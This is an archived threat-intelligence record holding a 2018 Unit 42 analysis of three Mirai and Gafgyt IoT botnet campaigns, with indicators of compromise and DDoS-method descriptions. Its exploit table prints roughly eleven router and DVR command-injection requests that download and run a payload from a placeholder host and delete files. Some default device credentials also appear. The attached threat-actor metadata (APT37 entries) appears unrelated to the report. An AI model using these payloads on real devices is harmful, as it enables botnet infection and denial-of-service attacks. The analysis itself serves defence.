{
	"id": "8e8a0a95-7ed0-4291-8f9a-977affa99f85",
	"created_at": "2026-04-06T00:18:34.375472Z",
	"updated_at": "2026-04-10T03:38:06.428233Z",
	"deleted_at": null,
	"sha1_hash": "139ee73a0b867fe8723fe4f204f997585d3c4379",
	"title": "Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 937151,
	"plain_text": "Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns\r\nBy Ruchna Nigam\r\nPublished: 2018-07-20 · Archived: 2026-04-05 17:34:52 UTC\r\nThe end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the\r\nMirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.\r\nSamples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT\r\nReaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that\r\nincorporated nine exploits in its code.\r\nIn their newest evolution, samples also target the D-Link DSL-2750B OS Command Injection  vulnerability, only a few\r\nweeks after the publication of its Metasploit module on the 25th of May (even though the vulnerability has been public\r\nknowledge since February of 2016).\r\nWhile exploring samples belonging to one of these campaigns, I also discovered they support several new DDoS methods\r\npreviously unused by Mirai variants.\r\nThis blog post details each campaign (in the chronological order they were observed) along with the exploits used, the new\r\nDDoS methods supported, ending in a comparative summary of the campaigns.  Also covered is the tangential discovery of\r\nsome Gafgyt samples incorporating new Layer 7 DDoS functionality targeting a known DDoS-protection provider.\r\nIOCs for different campaigns, if not mentioned under the corresponding section, can be found at the end of this blog post.\r\nCAMPAIGN 1: An evolution of Omni\r\nIn May 2018, the Omni botnet, a variant of Mirai, was found exploiting two vulnerabilities affecting Dasan GPON routers -\r\nCVE-2018-10561 (authentication bypass) and CVE-2018-1562 (command injection). 
The two vulnerabilities used in conjunction allow the execution of commands sent by an unauthenticated remote attacker to a vulnerable device.\r\nSince then the same family has evolved to incorporate several more exploits, detailed in Table 1.\r\nI used the sample below for this analysis:\r\nSHA256 3908cc1d8001f926031fbe55ce104448dbc20c9795b7c3cfbd9abe7b789f899d\r\nTable 1: Exploits incorporated in Campaign 1 samples (vulnerability, affected devices, exploit format)\r\nVulnerability: CVE-2018-10561, CVE-2018-10562\r\nAffected devices: Dasan GPON routers\r\nExploit format:\r\nXWebPageName=diag\u0026diag_action=ping\u0026wan_conlist=0\u0026dest_host= ;wget+http://%s/gpo\r\nO+-\u003e/tmp/gpon80;sh+/tmp/gpon80\u0026ipv=0\r\nXWebPageName=diag\u0026diag_action=ping\u0026wan_conlist=0\u0026dest_host= ;wget+http://%s/gpo\r\nO+-\u003e/tmp/gpon8080;sh+/tmp/gpon8080\u0026ipv=0\r\nVulnerability: CVE-2014-8361\r\nAffected devices: Different devices using the Realtek SDK with the miniigd daemon\r\nExploit format:\r\nPOST /picsdesc.xml\r\n\u003c?xml version=\"1.0\" ?\u003e\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\ns:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:AddPortMapping\r\nxmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"\u003e\u003cNewRemoteHost\u003e\r\n\u003c/NewRemoteHost\u003e\u003cNewExternalPort\u003e47500\u003c/NewExternalPort\u003e\r\n\u003cNewProtocol\u003eTCP\u003c/NewProtocol\u003e\u003cNewInternalPort\u003e44382\u003c/NewInternalPort\u003e\r\n\u003cNewInternalClient\u003e cd /tmp/; rm -rf*; wget http://%s/realtek \u003c/NewInternalClient\u003e\r\n\u003cNewEnabled\u003e1\u003c/NewEnabled\u003e\r\n\u003cNewPortMappingDescription\u003esyncthing\u003c/NewPortMappingDescription\u003e\r\n\u003cNewLeaseDuration\u003e0\u003c/NewLeaseDuration\u003e\u003c/u:AddPortMapping\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\r\n/picsdesc.xml\r\n\u003c?xml version=\"1.0\" ?\u003e\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\ns:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:AddPortMapping\r\nxmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"\u003e\u003cNewRemoteHost\u003e\r\n\u003c/NewRemoteHost\u003e\u003cNewExternalPort\u003e47500\u003c/NewExternalPort\u003e\r\n\u003cNewProtocol\u003eTCP\u003c/NewProtocol\u003e\u003cNewInternalPort\u003e44382\u003c/NewInternalPort\u003e\r\n\u003cNewInternalClient\u003e cd /tmp/;chmod +x realtek;./realtek realtek \u003c/NewInternalClient\u003e\r\n\u003cNewEnabled\u003e1\u003c/NewEnabled\u003e\r\n\u003cNewPortMappingDescription\u003esyncthing\u003c/NewPortMappingDescription\u003e\r\n\u003cNewLeaseDuration\u003e0\u003c/NewLeaseDuration\u003e\u003c/u:AddPortMapping\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\r\nVulnerability: Netgear setup.cgi unauthenticated RCE\r\nAffected devices: DGN1000 Netgear routers\r\nExploit format:\r\nGET /setup.cgi?next_file=netgear.cfg\u0026todo=syscmd\u0026cmd=rm+-rf+/tmp/*;wget+http://%s/net\r\nO+/tmp/netgear;sh+netgear\u0026curpath=/\u0026currentsetting.htm=1\r\nVulnerability: CVE-2017-17215\r\nAffected devices: Huawei HG532\r\nExploit format:\r\nPOST /ctrlt/DeviceUpgrade_1\r\n\u003c?xml version=\"1.0\" ?\u003e\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\ns:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:Upgrade\r\nxmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"\u003e\u003cNewStatusURL\u003e$(/bin/bu\r\nwget -g %s -l /tmp/huawei -r /huawei; sh /tmp/huawei)\u003c/NewStatusURL\u003e\r\n\u003cNewDownloadURL\u003e$(echo HUAWEIUPNP)\u003c/NewDownloadURL\u003e\u003c/u:Upgrade\u003e\u003c/s:Body\r\n\u003c/s:Envelope\u003e\r\nVulnerability: Eir WAN Side Remote Command Injection\r\nAffected devices: Eir D1000 routers\r\nExploit format:\r\nPOST /UD/act?1\r\n\u003c?xml version=\"1.0\"?\u003e\u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cSOAP-ENV:Body\u003e\r\n\u003cu:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\u0026qu ot;\u003e\u003cNewNTPServer1\u003e cd\r\n\u0026\u0026 rm -rf * \u0026\u0026 /bin/busybox wget http://%s/tr064 \u0026\u0026 sh /tmp/tr064 \u003c/NewNTPServer1\u003e\r\n\u003cNewNTPServer2\u003e echo OMNI \u003c/NewNTPServer2\u003e\u003cNewNTPServer3\u003e echo\r\nOMNI \u003c/NewNTPServer3\u003e\u003cNewNTPServer4\u003e echo OMNI \u003c/NewNTPServer4\u003e\r\n\u003cNewNTPServer5\u003e echo OMNI \u003c/NewNTPServer5\u003e\u003c/u:SetNTPServers\u003e\u003c/SOAP-ENV:Body\r\n\u003c/SOAP-ENV:Envelope\u003e\r\nVulnerability: HNAP SoapAction-Header Command Execution\r\nAffected devices: D-Link devices\r\nExploit format:\r\nPOST /HNAP1/\r\nSOAPAction: http://purenetworks.com/HNAP1/ cd /tmp \u0026\u0026 rm -rf * \u0026\u0026 wget http://%s/hn\r\nsh /tmp/hnap\r\n(Faulty exploit: this vulnerability stems from the fact that anything trailing the last '/' after the string “http://purenetworks.com/HNAP1/GetDeviceSettings” in the SoapAction header value is executed using the system command without sanitization. In this implementation, the exploit code is appended to “http://purenetworks.com/HNAP1/”, and hence the above condition will not be triggered. To the best of my knowledge this exploit will not work on any devices.)\r\nVulnerability: CCTV/DVR Remote Code Execution\r\nAffected devices: CCTVs, DVRs from over 70 vendors\r\nExploit format:\r\nGET /language/Swedish${IFS}\u0026\u0026cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s/crossweb;sh${IFS}/tmp/crossweb\u0026\u003er\u0026\u0026tar${IFS}/string.js\r\nVulnerability: JAWS Webserver unauthenticated shell command execution\r\nAffected devices: MVPower DVRs, among others\r\nExploit format:\r\nGET /shell?cd+/tmp;rm+-rf+*;wget+http://%s/jaws;sh+/tmp/jaws\r\nVulnerability: UPnP SOAP TelnetD Command Execution\r\nAffected devices: D-Link devices\r\nExploit format:\r\nPOST /soap.cgi?service=WANIPConn1\r\n\u003c?xml version=\"1.0\" ?\u003e\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\ns:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cSOAP-ENV:Body\u003e\r\n\u003cm:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\"\u003e\r\n\u003cNewPortMappingDescription\u003e\u003cNewPortMappingDescription\u003e\u003cNewLeaseDuration\u003e\r\n\u003c/NewLeaseDuration\u003e\u003cNewInternalClient\u003e cd /tmp;rm -rf *;wget http://%s/dlink;sh\r\n/tmp/dlink \u003c/NewInternalClient\u003e\u003cNewEnabled\u003e1\u003c/NewEnabled\u003e\r\n\u003cNewExternalPort\u003e634\u003c/NewExternalPort\u003e\u003cNewRemoteHost\u003e\u003c/NewRemoteHost\u003e\r\n\u003cNewProtocol\u003eTCP\u003c/NewProtocol\u003e\u003cNewInternalPort\u003e45\u003c/NewInternalPort\u003e\r\n\u003c/m:AddPortMapping\u003e\u003cSOAPENV:Body\u003e\u003cSOAPENV:envelope\u003e\r\nVulnerability: Netgear cgi-bin Command Injection\r\nAffected devices: Netgear R7000/R6400 devices\r\nExploit format:\r\nGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s/netgear2;${IFS}sh${IFS}/var/tmp/netgear2\r\nVulnerability: Vacron NVR RCE\r\nAffected devices: Vacron NVR devices\r\nExploit format:\r\nGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s/vacron;sh+/tmp/vacron\r\nAll of these vulnerabilities are publicly known and have been exploited by different botnets, either separately or in combination with others, in the past; however, this is the first Mirai variant using all eleven of them together.\r\nDifferentiating features of the campaign:\r\nTwo different encryption schemes: aside from using the standard XOR encryption scheme seen in all Mirai variants, in this case with the table key 0xBAADF00D, samples make use of a second key for the encryption of certain config strings.\r\nSamples rely solely on exploits for propagation and don’t perform a credential brute-force attack.\r\nFurther infection of already infected devices is prevented by dropping packets received on certain ports using iptables (Figure 1).\r\nFigure 1: Screenshot from malware disassembly showing the use of iptables to drop future connection attempts via certain ports\r\nThe campaign makes use of the IP 213[.]183.53.120 both for serving payloads and as a Command and Control (C2) server. Pivoting off this IP, I discovered some Gafgyt samples that surfaced around the same time reporting to the same IP, but using a new method named 'SendHTTPCloudflare'. 
This method is detailed at the end of this blog post.\r\nThis campaign was linked to the Omni variant by several references in the code, such as the one seen in Figure 2 below.\r\nFigure 2: OMNI reference in samples\r\nThe encrypted strings also reference a website, gpon[.]party, that was down at the time of this writing.\r\nFigure 3: gpon[.]party reference\r\nCAMPAIGN 2: Okane\r\nSamples from this campaign were served from the IP 46[.]243.189.101. This host briefly had an open directory containing the samples, as seen in the figure below.\r\nFigure 4: Screenshot from open directory at payload server 46[.]243.189.101\r\nThe payload source in this attack was located at hxxp://46[.]243.189.101/gang/. The downloaded payload is a shell script that attempts to replicate itself by downloading Okane binaries to vulnerable devices. On the 13th of June, the payload source for some of these samples was briefly replaced with the Cloudflare DNS server 1[.]1.1.1.\r\nThis campaign incorporates the same exploits listed in Table 1. Figure 5 shows these exploits being called sequentially in one of the samples belonging to this campaign. Each call results in the creation of a dedicated fork for each exploit.\r\nFigure 5: Screenshot from malware disassembly of exploit calls in a sample from Campaign 2\r\nUnlike the previous campaign, these samples also perform a credential brute force attack. Some unusual entries were discovered on the brute force lists in these samples, such as the following:\r\nroot/t0talc0ntr0l4! - default credentials for Control4 devices\r\nadmin/adc123 - default credentials for ADC FlexWave Prism devices\r\nmg3500/merlin - default credentials for Camtron IP cameras\r\nSome samples belonging to this campaign include the addition of two new DDoS methods to the Mirai source code. Below are descriptions of these new DDoS methods, extracted from the following sample.\r\nSHA256 320ed65d955bdde8fb17a35024f7bd978d26c041de1ddcf8a592974f77d82401\r\nattack_method_tcpxmas: involves sending TCP packets with all flags set, also known as Christmas tree packets. This could be considered a more effective means of DDoS since these packets “require much more processing by routers and end-hosts than the \"usual\" packets do.” This method has already been observed in use by Gafgyt and Kaiten variants in the past. The payload size of packets sent is set to 768 bytes.\r\nattack_method_std: involves sending packets with a randomized payload of 1024 bytes.\r\nDigging deeper reveals that samples using these attack methods have been part of a Mirai code fork from as early as August 2017.\r\nSome newer samples from the same campaign also integrate additional methods that only appear in samples from the beginning of June 2018. Some notable methods are detailed below.\r\nFor this analysis I used a sample with the following hash.\r\nSHA256 be1d722af56ba8a660218a8311c0482c5b2d096ba91485e7d9dfc12a2b8e00b3\r\nattack_method_udpgame: UDP DDoS using SOCK_RAW from a random source port to the destination port 27015 (often used by online game servers).\r\nattack_method_asyn: TCP DDoS using packets with random source and destination ports and the ACK and SYN flags set.\r\nattack_method_tcpfrag: TCP DDoS using SOCK_RAW with random source and destination ports and sequence number, and the flags URG, ACK, PSH, RST, SYN and FIN set. In this case the ‘Don’t Fragment’ bit is set to 1.\r\nattack_method_tcpall: same as attack_method_tcpfrag above, except the ‘Don’t Fragment’ bit is set to 0.\r\nattack_method_tcpusyn: TCP DDoS using packets with random source and destination ports and the URG and SYN flags set.\r\nOn the 19th of June, samples on this server were stripped of their exploits and reverted to using a simple brute force, subsequently dropping a shell script, for self-propagation.\r\nFigure 6: Shell script used by newer Okane samples for self-propagation\r\nCAMPAIGN 3: Hakai\r\nEarlier samples belonging to this campaign use all the exploits detailed in Table 1, except for the UPnP SOAP TelnetD Command Execution exploit. The payload source for this campaign was hxxp://hakaiboatnet[.]pw/m and the C2 server was 178[.]128.185.250. Samples make use of an encryption scheme similar to Mirai; unlike previous campaigns, they are built on the Gafgyt source code, which is also known as Bashlite, Lizkebab, Torlus or LizardStresser.\r\nSamples listen for the following commands (command - translation):\r\nSC ON - Scanner On\r\nSC OFF - Scanner Off\r\nH - HTTP Flood\r\nU - UDP Flood\r\nS - STD Flood\r\nT - TCP Flood\r\nKT - Kill scanner threads\r\nNewer samples from the same server were found to have also incorporated an OS Command Injection exploit against D-Link DSL-2750B devices. 
These samples use the same attack methods, encryption key and C2 as the samples above; however, they source their payload from hxxp://178[.]128.185.250/e.\r\nFigure 7: Exploit targeting D-Link DSL-2750B devices used in newer samples of the campaign\r\nSummary\r\nTable 2 shows a comparative summary of the three campaigns.\r\nCampaign 1: Evolution of OMNI\r\nExploits used: All exploits in Table 1\r\nBuilt on: Mirai\r\nPayload source: hxxp://213[.]183.53.120\r\nC2: 213[.]183.53.120\r\nConfig string encryption/decryption key: Two different keys used – 0xBAADF00D, 0xDEADBEEF (or the equivalent of a byte-wise XOR with 0x22)\r\nAlso brute-forces credentials: No\r\nCampaign 2: Okane\r\nExploits used: All exploits in Table 1\r\nBuilt on: Mirai\r\nPayload source: hxxp://46[.]243.189.101/gang/\r\nC2: 142[.]129.169.83:5888\r\nConfig string encryption/decryption key: 0xDEACFBEF\r\nAlso brute-forces credentials: Yes\r\nCampaign 3: Hakai\r\nExploits used: All exploits in Table 1, except UPnP SOAP TelnetD Command Execution. Newer samples also incorporate a D-Link DSL-2750B OS Command Injection exploit\r\nBuilt on: Gafgyt\r\nPayload source: hxxp://hakaiboatnet[.]pw/m, hxxp://178[.]128.185.250/e\r\nC2: 178[.]128.185.250\r\nConfig string encryption/decryption key: 0xDEDEFFBA\r\nAlso brute-forces credentials: Yes\r\nTable 2: Comparative summary of the attack campaigns\r\nGafgyt with a new Layer-7 attack\r\nLayer-7 DDoS attacks targeting specific DDoS protection service vendors are not new and were already observed in the form of the DvrHelper variant of Mirai. They have, however, not been observed in use by Gafgyt samples until now. While pivoting on the C2 used by samples of Campaign 1, I came across some Gafgyt samples listening for an additional command called HTTPCF.\r\nWhen this command is received, the bot calls a function called SendHTTPCloudflare that does as its name suggests, targeting a URL path used mostly by sites protected by Cloudflare. The earliest samples observed using this attack were from the end of May 2018.\r\nFigure 8: URL format targeted by HTTPCF\r\nSamples use the same IP, i.e. 213[.]183.53.120, at port 8013 for C2 communication.\r\nThey also make use of some unusual User-Agents (UA), as seen in Figure 9. All UAs found in these samples are listed in the appendix.\r\nFigure 9: Some unusual User Agents found in related Gafgyt samples\r\nConclusion\r\nThe initial rise of botnets targeting embedded systems brought to light the security risks from millions of Internet-connected devices configured with default credentials. The evolution of these botnets to the use of multiple exploits, be it IoT Reaper or the campaigns discussed here, shows how attackers can build enormous botnets consisting of different types of devices, all responding to the same C2 server. This is exacerbated by the speed of exploitation in the wild of newly released vulnerabilities and also highlights the need for security vendor reactivity in response to these disclosures, applicable to the subset of these devices that do fall under the protection of security devices. 
However, the onus is on device manufacturers to ensure their devices are easy to update, and that they deploy the updates in a timely manner.\r\nPalo Alto Networks customers benefit from the following protections against these attacks:\r\nAutoFocus customers can track these activities using individual exploit tags:\r\nCVE-2017-17215\r\nCVE-2014-8361\r\nDLinkOSInjection\r\nNetgearRCE\r\nVacronNVRRCE\r\nEirRCE\r\nGPONExploits\r\nDLinkDSL2750BOSCmdInjection\r\nAutoFocus customers can also use the following malware family tags:\r\nGafygt\r\nELFMirai\r\nWildFire detects all related samples with malicious verdicts.\r\nAll exploits and IPs/URLs involved in these campaigns are blocked through Threat Prevention and PAN-DB.\r\nIndicators of Compromise\r\nCampaign 1 samples\r\nCampaign 1 related URLs/IPs\r\n213[.]183.53.120\r\nOkane Multi-exploit samples\r\nOkane related IPs/URLs\r\n46[.]243.189.101\r\n142[.]129.169.83:5888\r\nOkane Multi-exploit samples fetching payload from 1.1.1.1\r\nOkane Multi-exploit samples using attack_method_tcpxmas and attack_method_std\r\nOkane sample without exploits using several additional DDoS methods\r\nHakai samples\r\nHakai URLs/IPs\r\nhakaiboatnet[.]pw\r\n178[.]128.185.250\r\nGafgyt HTTPCF samples\r\nAPPENDIX\r\nUser-Agents used by Gafgyt HTTPCF samples\r\nMOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1\r\nMozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000\r\nMozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0\r\nMOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0\r\nMozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)\r\nMozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)\r\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0\r\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0\r\nSonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1\r\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)\r\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)\r\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19\r\nMozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36\r\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r\nMozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62\r\nOpera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01\r\nOpera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16\r\nBlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100\r\nBlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1\r\nDoris/1.15 [en] (Symbian)\r\nBunjalloo/0.7.6(Nintendo DS;U;en)\r\nPSP (PlayStation Portable); 2.00\r\nMozilla/4.0 (PSP (PlayStation Portable); 2.00)\r\nwii libnup/1.0\r\nMozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2\r\nMozilla/5.0 (PLAYSTATION 3; 3.55)\r\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7\r\nMozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)\r\nMozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2\r\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911\r\nMozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201\r\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4\r\nMozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)\r\nMozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1\r\nMozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0\r\nSource: https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/"
	],
	"report_names": [
		"unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434714,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/139ee73a0b867fe8723fe4f204f997585d3c4379.pdf",
		"text": "https://archive.orkl.eu/139ee73a0b867fe8723fe4f204f997585d3c4379.txt",
		"img": "https://archive.orkl.eu/139ee73a0b867fe8723fe4f204f997585d3c4379.jpg"
	}
}